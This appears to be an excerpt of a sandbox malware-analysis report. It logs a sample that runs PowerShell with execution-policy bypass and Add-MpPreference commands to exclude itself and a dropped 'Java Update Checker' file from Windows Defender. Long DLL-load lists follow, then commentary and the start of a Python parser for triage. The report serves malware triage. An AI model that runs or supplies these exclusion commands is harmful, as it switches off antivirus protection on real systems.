Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Process created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x.exe'
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Process created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update Checker (64 bit).exe'
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Process created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update Checker (64 bit).exe'
Source: C:\Windows\svchost.com | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe'
Source: C:\Windows\svchost.com | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x.exe'
Source: C:\Windows\svchost.com | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update Checker (64 bit).exe'
Source: C:\Windows\svchost.com | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update Checker (64 bit).exe'
Source: C:\Users\user\Desktop\x.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\x.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\x.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\x.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\x.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\x.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\x.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\x.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\x.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\x.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\x.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\x.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\x.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\x.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\x.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\x.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\x.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\x.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\x.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\x.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\x.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\x.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: scrrun.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: avicap32.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: msvfw32.dll
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | Section loaded: winmm.dll
Source: C:\Windows\svchost.com | Section loaded: apphelp.dll
Source: C:\Windows\svchost.com | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
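The module list above repeats for each powershell.exe instance the sample spawned, and most of it is the normal PowerShell 5 baseline. What a triager actually wants from it is the small subset that carries signal: amsi.dll (script content is handed to the registered AV), wldp.dll (lockdown-policy query), and the CIM client stack (mi.dll, miutils.dll, wmidcom.dll, wbemcomn.dll), which a PowerShell host loads when a CIM-backed cmdlet runs; Defender's MpPreference cmdlets are CIM-backed, so that set is consistent with the exclusion-adding command this sample runs. The following is an added example, not part of the Joe Sandbox report: it parses "Section loaded" lines in the report's own fused format, deduplicates per image, and flags the interesting groups. The DLL groupings and the sample lines are constructed for the demo; treat the CIM hint as weak on its own and confirm it against the process command line.

```python
import re
from collections import OrderedDict

# Accepts both the fused "powershell.exeSection loaded:" form seen in extracted
# reports and the spaced form; case-insensitive because image paths vary.
LOAD_RE = re.compile(
    r"Source:\s*(?P<image>.+?\.exe)\s*Section loaded:\s*(?P<dll>\S+)", re.IGNORECASE
)

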